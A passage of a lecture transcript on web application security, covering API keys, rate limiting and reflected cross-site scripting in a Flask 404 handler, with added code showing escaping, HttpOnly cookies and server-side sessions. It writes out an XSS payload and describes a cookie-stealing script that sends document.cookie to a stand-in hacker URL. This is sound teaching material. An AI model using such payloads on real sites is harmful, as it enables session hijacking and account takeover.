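now[0] = 3600.0  # the next hour begins
print(limiter.allow("key-alice-123"))  # True
```

A fixed window is the simplest scheme; it can let a client make close to twice the limit in a short burst straddling two windows, which sliding-window variants smooth out.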

962
00:43:00,850 --> 00:43:05,170
And so in your project, you might
not have needed to use an API key,

963
00:43:05,170 --> 00:43:08,500
but anytime you want to deal with
potentially authenticated data

964
00:43:08,500 --> 00:43:11,950
or you want to rate limit, then you'll
want to think about using an API key

965
00:43:11,950 --> 00:43:14,350
like you did have to use
with the Goodreads API

966
00:43:14,350 --> 00:43:17,110
in order to take advantage
of features like rate

967
00:43:17,110 --> 00:43:19,180
limiting or authenticating
particular routes

968
00:43:19,180 --> 00:43:21,700
to make sure that only
certain users have the ability

969
00:43:21,700 --> 00:43:24,490
to access particular routes.

970
00:43:24,490 --> 00:43:27,350
Questions about that?

971
00:43:27,350 --> 00:43:27,850
All right.

972
00:43:27,850 --> 00:43:30,110
In that case, we'll take a short
break and when we come back,

973
00:43:30,110 --> 00:43:33,160
we'll take a look at JavaScript and look
at the many different kinds of security

974
00:43:33,160 --> 00:43:35,110
vulnerabilities that
come about when we start

975
00:43:35,110 --> 00:43:39,057
introducing JavaScript and client-side
code into our web applications.

976
00:43:39,057 --> 00:43:41,860


977
00:43:41,860 --> 00:43:42,760
Welcome back.

978
00:43:42,760 --> 00:43:45,370
So at about the
midway point in the course,

979
00:43:45,370 --> 00:43:47,320
we started to
talk about JavaScript.

980
00:43:47,320 --> 00:43:49,690
And so JavaScript, if you
recall, was the language

981
00:43:49,690 --> 00:43:51,537
that we were using in
order to write code

982
00:43:51,537 --> 00:43:54,370
on the client side, code that was
actually running inside the user's

983
00:43:54,370 --> 00:43:57,640
browser and not on the server
where Flask or Django was running,

984
00:43:57,640 --> 00:43:58,540
for instance.

985
00:43:58,540 --> 00:44:02,272
And this leads to a whole new host of
potential security vulnerabilities.

986
00:44:02,272 --> 00:44:03,730
So let's start to chat about these.

987
00:44:03,730 --> 00:44:05,377
What could go wrong?

988
00:44:05,377 --> 00:44:07,210
What sorts of exploits
could happen, can you

989
00:44:07,210 --> 00:44:10,830
think of, when we start to introduce
JavaScript into the equation?

990
00:44:10,830 --> 00:44:13,350
Code that can run inside
the user's browser.

991
00:44:13,350 --> 00:44:14,514
Yeah?

992
00:44:14,514 --> 00:44:18,820
AUDIENCE: When we [INAUDIBLE]
information, [INAUDIBLE] even that it

993
00:44:18,820 --> 00:44:19,981
can change.

994
00:44:19,981 --> 00:44:28,430
Like someone's address [INAUDIBLE]
that changing someone's

995
00:44:28,430 --> 00:44:33,484
address to someone else and
using JavaScript [INAUDIBLE].

996
00:44:33,484 --> 00:44:34,150
BRIAN YU: Great.

997
00:44:34,150 --> 00:44:36,760
So JavaScript has all these event
handlers that we've talked about,

998
00:44:36,760 --> 00:44:39,130
whether on load or on click,
that can do various things.

999
00:44:39,130 --> 00:44:41,837
And potentially, if someone
clicks on something and code that

1000
00:44:41,837 --> 00:44:43,670
does something malicious
is able to run,

1001
00:44:43,670 --> 00:44:45,670
it can make something
potentially bad happen.

1002
00:44:45,670 --> 00:44:48,610
And we'll take a look at at least
one example of that definitely

1003
00:44:48,610 --> 00:44:50,286
later on today.

1004
00:44:50,286 --> 00:44:52,160
Other things that could
potentially go wrong?

1005
00:44:52,160 --> 00:44:54,618
There are a lot of potential
security vulnerabilities here.

1006
00:44:54,618 --> 00:44:56,210
So let's just toss out some ideas.

1007
00:44:56,210 --> 00:45:00,642


1008
00:45:00,642 --> 00:45:02,350
What would we want to
avoid happening now

1009
00:45:02,350 --> 00:45:05,110
that we have JavaScript code
that can run inside the browser?

1010
00:45:05,110 --> 00:45:09,022


1011
00:45:09,022 --> 00:45:15,974
AUDIENCE: Someone might redirect from
the site you're on to another site.

1012
00:45:15,974 --> 00:45:16,640
BRIAN YU: Great.

1013
00:45:16,640 --> 00:45:18,620
Certainly, someone might try
and redirect from the site

1014
00:45:18,620 --> 00:45:19,828
you're on to some other site.

1015
00:45:19,828 --> 00:45:22,850
We've looked at ways that
we can use JavaScript in order

1016
00:45:22,850 --> 00:45:25,170
to redirect someone from
one place to another.

1017
00:45:25,170 --> 00:45:27,800
And if we're not careful,
that JavaScript code

1018
00:45:27,800 --> 00:45:30,860
might be able to redirect the user
to someplace that the user doesn't

1019
00:45:30,860 --> 00:45:32,090
necessarily want to be.

1020
00:45:32,090 --> 00:45:35,760
And so we'll definitely look at
an example of that later on, too.

1021
00:45:35,760 --> 00:45:37,870
So that's definitely one
potential vulnerability.

1022
00:45:37,870 --> 00:45:38,370
Yeah?

1023
00:45:38,370 --> 00:45:41,529
AUDIENCE: So like with HTML and
CSS, it was all static, just

1024
00:45:41,529 --> 00:45:42,656
like what a user sees.

1025
00:45:42,656 --> 00:45:44,364
But with JavaScript,
you can actually use

1026
00:45:44,364 --> 00:45:46,632
it to run code on someone's machine.

1027
00:45:46,632 --> 00:45:51,980
So if you write a malicious code, you
can [INAUDIBLE] someone's computer.

1028
00:45:51,980 --> 00:45:52,730
BRIAN YU: Exactly.

1029
00:45:52,730 --> 00:45:55,700
So with HTML and CSS,
we didn't really need

1030
00:45:55,700 --> 00:45:58,490
to worry about code
actually running for the most part

1031
00:45:58,490 --> 00:46:00,770
because it was just here's
the way that things look.

1032
00:46:00,770 --> 00:46:03,767
And certainly we were able to
use that to try and trick users

1033
00:46:03,767 --> 00:46:06,350
by creating a link that looked
like it went to Bank of America

1034
00:46:06,350 --> 00:46:09,030
but actually went to my
version of some different site.

1035
00:46:09,030 --> 00:46:11,540
But when it comes to
JavaScript, now we really

1036
00:46:11,540 --> 00:46:16,130
have the potential for malicious code
to be running on the user's web browser.

1037
00:46:16,130 --> 00:46:18,950
And so how does that code get
to the user's web browser?

1038
00:46:18,950 --> 00:46:24,500
How does malicious code enter into
some other seemingly benign site,

1039
00:46:24,500 --> 00:46:27,322
and why might those
be potential exploits?

1040
00:46:27,322 --> 00:46:30,530
So where we'll start is by looking at
one potential JavaScript exploit, which

1041
00:46:30,530 --> 00:46:33,240
is quite common, called
cross-site scripting.

1042
00:46:33,240 --> 00:46:35,450
Where the idea of
cross-site scripting is

1043
00:46:35,450 --> 00:46:38,300
that we're going to try and
look for a vulnerability

1044
00:46:38,300 --> 00:46:41,220
where we can-- in the same
way that in the SQL case,

1045
00:46:41,220 --> 00:46:45,890
we were able to inject whatever SQL code
we wanted into being run on a database,

1046
00:46:45,890 --> 00:46:49,355
a malicious user, if they are able to
send the right link to the right person

1047
00:46:49,355 --> 00:46:51,230
and get them to click
on a link for instance,

1048
00:46:51,230 --> 00:46:55,820
are able to get some arbitrary
JavaScript code to run inside

1049
00:46:55,820 --> 00:46:57,700
of the user's web browser.

1050
00:46:57,700 --> 00:47:00,952
And so let's take a look at a
very simple Flask application.

1051
00:47:00,952 --> 00:47:03,410
This is in fact, the entire
Flask application, the contents

1052
00:47:03,410 --> 00:47:05,930
of application.py, for example.

1053
00:47:05,930 --> 00:47:09,254
And there is in fact, a
major cross-site scripting

1054
00:47:09,254 --> 00:47:11,420
vulnerability inside this
application; let's see if we

1055
00:47:11,420 --> 00:47:13,320
can tease apart where exactly that is.

1056
00:47:13,320 --> 00:47:16,010
So at the beginning, we import
Flask, and we import request,

1057
00:47:16,010 --> 00:47:17,780
which we'll need access to later.

1058
00:47:17,780 --> 00:47:22,430
We create a new Flask application
inside the current module.

1059
00:47:22,430 --> 00:47:25,880
Then we define a default route,
just when you go to the slash route.

1060
00:47:25,880 --> 00:47:29,120
It calls this index function
that returns Hello, world.

1061
00:47:29,120 --> 00:47:32,420
And then down here, we
have app.errorhandler(404).

1062
00:47:32,420 --> 00:47:34,640
So you may not have seen
this before, but Flask

1063
00:47:34,640 --> 00:47:37,340
has built-in error handlers
that are specific functions that

1064
00:47:37,340 --> 00:47:39,590
run when specific error codes happen.

1065
00:47:39,590 --> 00:47:41,930
So 404, you might
recall, is the error code

1066
00:47:41,930 --> 00:47:44,210
for not found when someone
goes to a page that

1067
00:47:44,210 --> 00:47:45,920
doesn't exist on the web server.

1068
00:47:45,920 --> 00:47:50,390
And what Flask can do for you is say
whenever a 404 error happens on the web

1069
00:47:50,390 --> 00:47:54,230
server, go ahead and run this function,
which is going to supposedly render

1070
00:47:54,230 --> 00:47:55,650
my 404 error page.

1071
00:47:55,650 --> 00:47:57,870
And you can do the same
thing for error 500,

1072
00:47:57,870 --> 00:48:00,940
for example, internal server
errors, or 403, forbidden errors,

1073
00:48:00,940 --> 00:48:02,806
or any other error
status code you want.

1074
00:48:02,806 --> 00:48:05,180
If you want particular code
to run, a particular template

1075
00:48:05,180 --> 00:48:09,470
to be displayed when a particular error
code happens on your web application,

1076
00:48:09,470 --> 00:48:12,320
you can use Flask's
built-in error handler

1077
00:48:12,320 --> 00:48:15,450
to be able to handle those
particular situations.

1078
00:48:15,450 --> 00:48:18,650
So what we have here is a function
that is supposed to handle 404 errors,

1079
00:48:18,650 --> 00:48:20,540
that handles a page not found error.

1080
00:48:20,540 --> 00:48:23,390
It calls this page not found
function, and all the page not

1081
00:48:23,390 --> 00:48:26,670
found function is going to
do is say return not found.

1082
00:48:26,670 --> 00:48:30,080
And then it's going to append
request.path, where request.path

1083
00:48:30,080 --> 00:48:32,930
is what the URL was that
the user tried to go

1084
00:48:32,930 --> 00:48:35,900
to that resulted in the 404 error.

1085
00:48:35,900 --> 00:48:38,070
And so what might that mean?

1086
00:48:38,070 --> 00:48:41,090
It means that if a user
goes to /foo, for example,

1087
00:48:41,090 --> 00:48:43,150
then what's going to happen is--

1088
00:48:43,150 --> 00:48:50,591
I'll go ahead and go into
cross-site scripting zero

1089
00:48:50,591 --> 00:48:52,340
and go ahead and run
this web application,

1090
00:48:52,340 --> 00:48:53,652
running that very same code.

1091
00:48:53,652 --> 00:48:55,860
So I get hello, world when
I go to the default route,

1092
00:48:55,860 --> 00:48:58,110
don't type in anything after the URL.

1093
00:48:58,110 --> 00:49:02,276
But if I go to /foo for example,
what do I expect to see?

1094
00:49:02,276 --> 00:49:03,374
AUDIENCE: Error not found.

1095
00:49:03,374 --> 00:49:04,040
BRIAN YU: Great.

1096
00:49:04,040 --> 00:49:08,300
Not Found: foo, because not found
was the initial message that

1097
00:49:08,300 --> 00:49:10,340
appears whenever a 404 error happens.

1098
00:49:10,340 --> 00:49:14,180
And then /foo is the path, the
request path that I tried to request.

1099
00:49:14,180 --> 00:49:15,680
And so this might be pretty typical.

1100
00:49:15,680 --> 00:49:17,690
That if I go to a URL
that doesn't exist,

1101
00:49:17,690 --> 00:49:20,510
I probably expect a page like
this to show up that says, sorry,

1102
00:49:20,510 --> 00:49:22,760
this route, this path that
you were trying to request,

1103
00:49:22,760 --> 00:49:25,650
couldn't be found on the web server.

1104
00:49:25,650 --> 00:49:27,750
So what can go wrong there?

1105
00:49:27,750 --> 00:49:31,660
Here's the web application,
where's the security vulnerability?

1106
00:49:31,660 --> 00:49:32,160
Yeah?

1107
00:49:32,160 --> 00:49:37,050
AUDIENCE: So someone maybe could
somehow inject a script path

1108
00:49:37,050 --> 00:49:42,269
into your request path location.

1109
00:49:42,269 --> 00:49:43,310
BRIAN YU: Great, exactly.

1110
00:49:43,310 --> 00:49:45,920
So the vulnerability is
with this request path.

1111
00:49:45,920 --> 00:49:51,260
That if someone is able to inject
JavaScript code into this request

1112
00:49:51,260 --> 00:49:54,530
path, now suddenly, the
thing that I'm returning

1113
00:49:54,530 --> 00:49:57,650
is not found colon,
potentially some JavaScript

1114
00:49:57,650 --> 00:49:59,180
code that is then going to be run.

1115
00:49:59,180 --> 00:50:02,750
And you might imagine that if a hacker
now is able to take one of these URLs

1116
00:50:02,750 --> 00:50:06,370
and convince a user to click on a link
that takes them to a URL like that,

1117
00:50:06,370 --> 00:50:10,280
that takes them to this particular
function in my Flask application, now

1118
00:50:10,280 --> 00:50:13,370
suddenly this hacker is able to
run whatever JavaScript code they

1119
00:50:13,370 --> 00:50:15,980
want to inside of the web application.

1120
00:50:15,980 --> 00:50:17,340
So what might that look like?

1121
00:50:17,340 --> 00:50:22,030
Instead of just going to /foo as the
route that returns a benign not found

1122
00:50:22,030 --> 00:50:30,020
/foo on the page, what if, for instance,
the user typed in this as their URL?

1123
00:50:30,020 --> 00:50:36,320
Where after the slash, they type
<script>alert('hi')</script>, some JavaScript code.

1124
00:50:36,320 --> 00:50:39,170
Now this is going to be
the request path, which

1125
00:50:39,170 --> 00:50:42,290
means what gets put into
return not found colon,

1126
00:50:42,290 --> 00:50:44,270
we're going to return
some page that says not

1127
00:50:44,270 --> 00:50:46,700
found and then this JavaScript code.

1128
00:50:46,700 --> 00:50:51,400
This JavaScript code
that says alert, hi.

1129
00:50:51,400 --> 00:50:53,570
So this is code that, if someone
clicks on the link,

1130
00:50:53,570 --> 00:50:56,532
might potentially be
executed by this web browser,

1131
00:50:56,532 --> 00:50:57,990
an example of cross-site scripting.

1132
00:50:57,990 --> 00:51:00,290
That someone is able
to send me this link,

1133
00:51:00,290 --> 00:51:03,290
and they were able to inject random
JavaScript, whatever they want,

1134
00:51:03,290 --> 00:51:05,550
into this particular application.
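
A minimal sketch of the bug and its fix, assuming the Flask route from the demo builds its response as "Not Found: " plus the raw request path (the route itself isn't shown in this excerpt). To keep it runnable without Flask, the handler is modeled as two plain functions with hypothetical names. The standard library's `html.escape` turns `<`, `>`, `&`, and quotes into HTML entities, so the payload is displayed as text rather than parsed as a `<script>` element.

```python
from html import escape


def not_found_unsafe(path: str) -> str:
    # Hypothetical stand-in for the vulnerable route: the raw path is
    # concatenated straight into the HTML response.
    return "Not Found: " + path


def not_found_safe(path: str) -> str:
    # Same response, but the path is escaped first: < becomes &lt;, > becomes &gt;,
    # and quotes become entities, so the browser shows the text instead of running it.
    return "Not Found: " + escape(path)


payload = "/<script>alert('hi')</script>"
print(not_found_unsafe(payload))  # Not Found: /<script>alert('hi')</script>
print(not_found_safe(payload))    # Not Found: /&lt;script&gt;alert(&#x27;hi&#x27;)&lt;/script&gt;
```

In a real Flask app, the `markupsafe` package that Flask depends on provides an equivalent `escape` function.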

1135
00:51:05,550 --> 00:51:07,620
So let's try it.

1136
00:51:07,620 --> 00:51:10,220
So again, going to /foo,
says Not Found, foo.

1137
00:51:10,220 --> 00:51:13,790
If I do a /bar, it says Not Found bar.

1138
00:51:13,790 --> 00:51:20,780
What's going to happen if I
do /<script>alert('hi')</script>?

1139
00:51:20,780 --> 00:51:23,270
So here's my URL now.

1140
00:51:23,270 --> 00:51:28,220
Rather than type in foo or bar,
I've added this JavaScript code

1141
00:51:28,220 --> 00:51:30,470
to the URL and I'm going
to try and run that.

1142
00:51:30,470 --> 00:51:32,363
What's going to happen?

1143
00:51:32,363 --> 00:51:34,112
AUDIENCE: An alert.

1144
00:51:34,112 --> 00:51:35,070
AUDIENCE: Get an alert.

1145
00:51:35,070 --> 00:51:35,790
BRIAN YU: We'll get an alert.

1146
00:51:35,790 --> 00:51:37,710
That's what we expect
to happen, at least.

1147
00:51:37,710 --> 00:51:40,680
In fact, Chrome is getting
pretty good at this.

1148
00:51:40,680 --> 00:51:43,380
Chrome and other web browsers
have built-in security features.

1149
00:51:43,380 --> 00:51:44,760
So Chrome actually stopped me.

1150
00:51:44,760 --> 00:51:47,700
It gave me this page that
says, this page isn't working.

1151
00:51:47,700 --> 00:51:49,800
Chrome detected unusual
code on this page

1152
00:51:49,800 --> 00:51:52,020
and blocked it to protect
your personal information,

1153
00:51:52,020 --> 00:51:54,353
for example, passwords, phone
numbers, and credit cards.

1154
00:51:54,353 --> 00:51:57,930
And if we look down here, it
says ERR_BLOCKED_BY_XSS_AUDITOR,

1155
00:51:57,930 --> 00:52:01,980
where XSS is cross-site scripting: error
blocked by the cross-site scripting auditor.

1156
00:52:01,980 --> 00:52:03,900
So Chrome's got some
built-in feature here

1157
00:52:03,900 --> 00:52:06,150
that's checking for potential
cross-site scripting,

1158
00:52:06,150 --> 00:52:08,400
like what we just tried to
do, and it's blocking me

1159
00:52:08,400 --> 00:52:09,924
from getting access to this page.

1160
00:52:09,924 --> 00:52:12,840
And this defends against certainly
some kinds of cross-site scripting,

1161
00:52:12,840 --> 00:52:13,560
but not all.

1162
00:52:13,560 --> 00:52:17,610
And we'll see an example of one which
bypasses Chrome in just a moment.

1163
00:52:17,610 --> 00:52:19,710
And certainly you can't
rely on all web browsers

1164
00:52:19,710 --> 00:52:22,860
to have this kind of
cross-site scripting auditor built in,

1165
00:52:22,860 --> 00:52:25,800
so these are definitely still
things to be careful about.

1166
00:52:25,800 --> 00:52:29,070
So what would happen if this auditor
didn't exist, if it wasn't in place?

1167
00:52:29,070 --> 00:52:30,420
We can actually find out.

1168
00:52:30,420 --> 00:52:33,780
Chrome actually lets us do that: if
I run Chrome from the command line

1169
00:52:33,780 --> 00:52:38,640
with the flag
--disable-xss-auditor,

1170
00:52:38,640 --> 00:52:41,640
I can run Chrome without running
the cross-site scripting auditor.

1171
00:52:41,640 --> 00:52:43,230
Just turn that auditor off.

1172
00:52:43,230 --> 00:52:47,970
And now if I go to /<script>
alert('hi')</script>, just like I did before,

1173
00:52:47,970 --> 00:52:51,810
and press Return, now I
get the alert that says hi.

1174
00:52:51,810 --> 00:52:54,390
I've injected JavaScript
code into this page,

1175
00:52:54,390 --> 00:52:57,300
and after I press OK, now
it says not found, slash.

1176
00:52:57,300 --> 00:53:00,270
And of course that
seemed relatively benign.

1177
00:53:00,270 --> 00:53:02,040
An alert certainly showed up.

1178
00:53:02,040 --> 00:53:05,010
JavaScript code was running, but
nothing was really compromised.

1179
00:53:05,010 --> 00:53:06,900
So where might this go wrong?

1180
00:53:06,900 --> 00:53:09,150
Where could this really
become a problem?

1181
00:53:09,150 --> 00:53:14,170
Can anyone think of why this might
really start to become an issue?

1182
00:53:14,170 --> 00:53:15,670
Injecting arbitrary JavaScript code.

1183
00:53:15,670 --> 00:53:15,900
Yeah?

1184
00:53:15,900 --> 00:53:17,960
AUDIENCE: An executable
could be put in there.

1185
00:53:17,960 --> 00:53:18,626
BRIAN YU: Great.

1186
00:53:18,626 --> 00:53:21,480
Any executable thing could be
put into this JavaScript code

1187
00:53:21,480 --> 00:53:23,070
so that any code could run.

1188
00:53:23,070 --> 00:53:26,070
And in particular, that
means that anything

1189
00:53:26,070 --> 00:53:29,160
could happen on the web
browser, including potentially

1190
00:53:29,160 --> 00:53:31,650
secure information being exposed.

1191
00:53:31,650 --> 00:53:36,036
And so in the case of Flask and
when we talked about logging

1192
00:53:36,036 --> 00:53:38,410
in and logging out, we've
talked about this a little bit,

1193
00:53:38,410 --> 00:53:40,650
how does the browser know--

1194
00:53:40,650 --> 00:53:44,100
or when the server is-- when
someone logs into a website

1195
00:53:44,100 --> 00:53:46,290
and the server says, OK,
this user is now logged in.

1196
00:53:46,290 --> 00:53:49,331
When I go and click on another button,
how does the browser or the server

1197
00:53:49,331 --> 00:53:51,830
still know that I'm the one
logged into the website?

1198
00:53:51,830 --> 00:53:52,770
AUDIENCE: Session.

1199
00:53:52,770 --> 00:53:54,145
BRIAN YU: The session, certainly.

1200
00:53:54,145 --> 00:53:55,075
And how does that--

1201
00:53:55,075 --> 00:53:58,741
or what do we know from the--
what's happening on the client side?

1202
00:53:58,741 --> 00:54:00,990
How does it know that it's
coming from the same place?

1203
00:54:00,990 --> 00:54:03,450
That it's the same user
that's making that request?

1204
00:54:03,450 --> 00:54:04,650
AUDIENCE: It's in a cookie.

1205
00:54:04,650 --> 00:54:06,066
BRIAN YU: Inside of a cookie, yes.

1206
00:54:06,066 --> 00:54:09,364
So that we've got some cookie, some
information, stored in our computer.

1207
00:54:09,364 --> 00:54:12,280
That is the cookie that tells the
server-- it's like a hand stamp that

1208
00:54:12,280 --> 00:54:13,236
says, yes, this is me.

1209
00:54:13,236 --> 00:54:15,360
Show me the same page that
I was looking at before.

1210
00:54:15,360 --> 00:54:16,550
I'm still logged in.

1211
00:54:16,550 --> 00:54:19,696
And we talked about if someone were
ever to get access to that cookie,

1212
00:54:19,696 --> 00:54:21,320
then they would be able to log in as us.

1213
00:54:21,320 --> 00:54:24,060
They could pretend to be us and
therefore use our credentials,

1214
00:54:24,060 --> 00:54:26,310
and the server wouldn't be
able to tell the difference

1215
00:54:26,310 --> 00:54:28,590
because that cookie is a
valid cookie, for instance.

1216
00:54:28,590 --> 00:54:31,270
And so let's take a look
at what happens if it wasn't

1217
00:54:31,270 --> 00:54:36,030
this script that was being passed
into the application, but this script.

1218
00:54:36,030 --> 00:54:38,440
Slightly different,
slightly more complicated.

1219
00:54:38,440 --> 00:54:41,370
We've got /<script>, so
we're starting JavaScript.

1220
00:54:41,370 --> 00:54:45,030
We say document.write, which
is just a way of writing

1221
00:54:45,030 --> 00:54:48,960
new information, new text, into
the HTML content of the page,

1222
00:54:48,960 --> 00:54:51,870
and we're adding an image,
which seems sort of strange.

1223
00:54:51,870 --> 00:54:55,080
Image source equals hacker
URL, where hacker URL

1224
00:54:55,080 --> 00:54:57,930
is some URL of some hacker's website.

1225
00:54:57,930 --> 00:55:03,177
And cookie equals, and then
we added document.cookie,

1226
00:55:03,177 --> 00:55:05,760
which is going to represent the
cookie for this particular web

1227
00:55:05,760 --> 00:55:07,920
browser, this particular page.

1228
00:55:07,920 --> 00:55:11,010
And then the closing angle bracket, and
that's the end of the JavaScript.

1229
00:55:11,010 --> 00:55:17,190
We effectively just added an image tag
into the page where the source of that

1230
00:55:17,190 --> 00:55:23,024
image is supposedly hacker_url?cookie=
followed by the value of document.cookie.

1231
00:55:23,024 --> 00:55:23,940
Why is that a problem?

1232
00:55:23,940 --> 00:55:25,250
What's just happened here?

1233
00:55:25,250 --> 00:55:25,750
Yeah?

1234
00:55:25,750 --> 00:55:27,833
AUDIENCE: You're going to
hit the hacker's website

1235
00:55:27,833 --> 00:55:31,650
and pass your cookie as a [INAUDIBLE].

1236
00:55:31,650 --> 00:55:32,400
BRIAN YU: Exactly.

1237
00:55:32,400 --> 00:55:36,002
We're going to hit the hacker's
website, and any time we're

1238
00:55:36,002 --> 00:55:38,460
making a request to that server,
that server is potentially

1239
00:55:38,460 --> 00:55:40,650
logging exactly what URL was requested.

1240
00:55:40,650 --> 00:55:43,200
In fact, if you've been using
Flask or Django all this time

1241
00:55:43,200 --> 00:55:44,908
and you've looked at
the terminal window,

1242
00:55:44,908 --> 00:55:47,439
you've probably noticed
over here that you've

1243
00:55:47,439 --> 00:55:49,730
been able to see every single
request that's been made.

1244
00:55:49,730 --> 00:55:54,510
Here was a GET request to the URL slash,
here's a GET request to the URL /foo,

1245
00:55:54,510 --> 00:55:56,870
here's a GET request to the URL /bar.

1246
00:55:56,870 --> 00:56:01,140
And so if our hacker is carefully
monitoring all of the requests

1247
00:56:01,140 --> 00:56:04,920
to the server over here at hacker URL,
they're going to notice something like

1248
00:56:04,920 --> 00:56:09,480
someone made a request to
hacker_url?cookie= and then some

1249
00:56:09,480 --> 00:56:10,200
cookie, right?

1250
00:56:10,200 --> 00:56:13,620
So by injecting this JavaScript
code into the user's web browser

1251
00:56:13,620 --> 00:56:16,470
and having this run, they've
added this image tag that's

1252
00:56:16,470 --> 00:56:18,810
going to make a request
to hacker_url and is

1253
00:56:18,810 --> 00:56:21,480
going to pass this information,
that cookie-- so now

1254
00:56:21,480 --> 00:56:23,610
the cookie that was
originally on your computer,

1255
00:56:23,610 --> 00:56:27,210
someone else now has access to
because you've now just put it inside

1256
00:56:27,210 --> 00:56:29,185
of some request that's going elsewhere.

1257
00:56:29,185 --> 00:56:32,310
And that's why Chrome was giving us
that error, that warning message about,

1258
00:56:32,310 --> 00:56:32,940
well, be careful.

1259
00:56:32,940 --> 00:56:35,898
We tried to block you from being able
to see this page because it looks

1260
00:56:35,898 --> 00:56:38,770
like someone might be able to
inject JavaScript code that

1261
00:56:38,770 --> 00:56:41,860
might be able to steal your
passwords or other information.

1262
00:56:41,860 --> 00:56:46,660
Because any information can just be
sent along in a request to some other URL,

1263
00:56:46,660 --> 00:56:47,930
in this case.

1264
00:56:47,930 --> 00:56:50,890
And so this is really the danger of
cross-site scripting, this ability

1265
00:56:50,890 --> 00:56:55,090
to inject JavaScript
into any arbitrary page.

1266
00:56:55,090 --> 00:56:57,689
Questions about any of that?

1267
00:56:57,689 --> 00:56:58,480
AUDIENCE: Question.

1268
00:56:58,480 --> 00:56:59,020
BRIAN YU: Great.

1269
00:56:59,020 --> 00:56:59,530
Yeah?

1270
00:56:59,530 --> 00:57:01,155
AUDIENCE: What did they do with cookie?

1271
00:57:01,155 --> 00:57:01,951
I mean--

1272
00:57:01,951 --> 00:57:02,950
BRIAN YU: Good question.

1273
00:57:02,950 --> 00:57:04,160
What can we do with the cookie?

1274
00:57:04,160 --> 00:57:06,243
So once you have the cookie,
you could potentially

1275
00:57:06,243 --> 00:57:08,950
use that to log in as
someone else, for instance.

1276
00:57:08,950 --> 00:57:12,200
Or any secure information that's stored
in that cookie, you'd have access to.

1277
00:57:12,200 --> 00:57:15,954
So if there are secure pieces
of data stored in the cookie,

1278
00:57:15,954 --> 00:57:17,620
then that's potentially a vulnerability.

1279
00:57:17,620 --> 00:57:19,872
And we talked about in
last lecture, I believe,

1280
00:57:19,872 --> 00:57:21,580
how Flask gives you
the option of, if you

1281
00:57:21,580 --> 00:57:24,880
want to, storing all of your session
information inside of a cookie.

1282
00:57:24,880 --> 00:57:28,760
Which means secure information about
the contents of your shopping cart

1283
00:57:28,760 --> 00:57:30,550
or how much money you
have in your account

1284
00:57:30,550 --> 00:57:32,440
might be stored inside
of that cookie, which

1285
00:57:32,440 --> 00:57:34,090
could potentially be a vulnerability.

1286
00:57:34,090 --> 00:57:36,020
But even if that's
not there, at minimum,

1287
00:57:36,020 --> 00:57:38,860
that cookie is a way of
convincing the server

1288
00:57:38,860 --> 00:57:40,970
that you are who you say you are.

1289
00:57:40,970 --> 00:57:44,260
If they steal your cookie, they can
convince the server that they are you.

1290
00:57:44,260 --> 00:57:45,790
And then they can have
access to your account

1291
00:57:45,790 --> 00:57:48,550
on whatever web application this
is and potentially do whatever

1292
00:57:48,550 --> 00:57:50,725
they want with that information.
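
One common mitigation for this kind of cookie theft, not covered in this part of the lecture, is to mark the session cookie `HttpOnly`. That flag tells the browser not to expose the cookie to JavaScript through `document.cookie`, and `Secure` additionally limits it to HTTPS. Below is a minimal sketch using the standard library's `http.cookies`; the cookie name `session` and the value are placeholders. It does not stop injected scripts from acting inside the page, so escaping output remains the primary defense.

```python
from http.cookies import SimpleCookie


def session_set_cookie_header(session_id: str) -> str:
    cookie = SimpleCookie()
    cookie["session"] = session_id          # placeholder cookie name
    cookie["session"]["httponly"] = True    # hidden from document.cookie
    cookie["session"]["secure"] = True      # only sent over HTTPS
    cookie["session"]["path"] = "/"         # valid for the whole site
    return cookie.output()                  # a full "Set-Cookie: ..." header line


print(session_set_cookie_header("abc123"))
```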

1293
00:57:50,725 --> 00:57:56,170
AUDIENCE: Would that be time bound
with the-- like with that session,

1294
00:57:56,170 --> 00:57:58,150
that you'd have to use
it for the next session?

1295
00:57:58,150 --> 00:57:59,090
BRIAN YU: Good question.

1296
00:57:59,090 --> 00:57:59,810
Would it be time bounded?

1297
00:57:59,810 --> 00:58:00,935
It quite possibly could be.

1298
00:58:00,935 --> 00:58:02,920
That if I were to log
out for instance and now

1299
00:58:02,920 --> 00:58:05,830
the server forgets about that
cookie, now suddenly we've

1300
00:58:05,830 --> 00:58:08,230
been able to avert this
scenario, or this is no longer

1301
00:58:08,230 --> 00:58:09,279
going to be a valid way.

1302
00:58:09,279 --> 00:58:12,070
But if they can convince me to
click on the URL again the next time

1303
00:58:12,070 --> 00:58:15,590
I log into the site, now it suddenly
becomes a problem all over again.
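
The time-bounding idea in this answer can be sketched with a server-side session table: the cookie holds only a random token, and the server decides whether that token is still valid. `SessionStore` is a hypothetical, in-memory sketch assuming a fixed lifetime; `now` is a parameter only so the behavior can be tested deterministically. Once the user logs out or the lifetime passes, a stolen token stops working, though a fresh token can be stolen again if the vulnerability is still there.

```python
from __future__ import annotations

import secrets
import time


class SessionStore:
    """Hypothetical in-memory session table mapping token -> (user, expiry time)."""

    def __init__(self, lifetime_seconds: float = 3600.0) -> None:
        self.lifetime = lifetime_seconds
        self._sessions: dict[str, tuple[str, float]] = {}

    def login(self, user: str, now: float | None = None) -> str:
        now = time.time() if now is None else now
        token = secrets.token_urlsafe(32)  # unguessable value stored in the cookie
        self._sessions[token] = (user, now + self.lifetime)
        return token

    def lookup(self, token: str, now: float | None = None) -> str | None:
        now = time.time() if now is None else now
        entry = self._sessions.get(token)
        if entry is None:
            return None  # unknown or already logged-out token
        user, expires_at = entry
        if now >= expires_at:
            del self._sessions[token]  # expired: forget it
            return None
        return user

    def logout(self, token: str) -> None:
        # The server forgets the token, so any copy of the cookie becomes useless.
        self._sessions.pop(token, None)
```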

1304
00:58:15,590 --> 00:58:17,590
And so we'll want to think
carefully about, when

1305
00:58:17,590 --> 00:58:20,480
we're using JavaScript inside
of our web applications,

1306
00:58:20,480 --> 00:58:22,610
whether there's a place where
we might be vulnerable.

1307
00:58:22,610 --> 00:58:26,470
In fact, our original web application
didn't even have any JavaScript in it

1308
00:58:26,470 --> 00:58:27,320
at all.

1309
00:58:27,320 --> 00:58:30,760
It was really just Flask
and returning text.

1310
00:58:30,760 --> 00:58:34,900
But still, a malicious hacker was able
to inject JavaScript into our page

1311
00:58:34,900 --> 00:58:38,552
just because we were including the
raw, unescaped request path in the page.

1312
00:58:38,552 --> 00:58:40,510
So these are certainly
things to be mindful of.

1313
00:58:40,510 --> 00:58:43,180
And both Flask and Django
have ways of making sure

1314
00:58:43,180 --> 00:58:46,960
that when you're inserting information,
it's inserted in a safe way such

1315
00:58:46,960 --> 00:58:50,200
that we escape any potentially
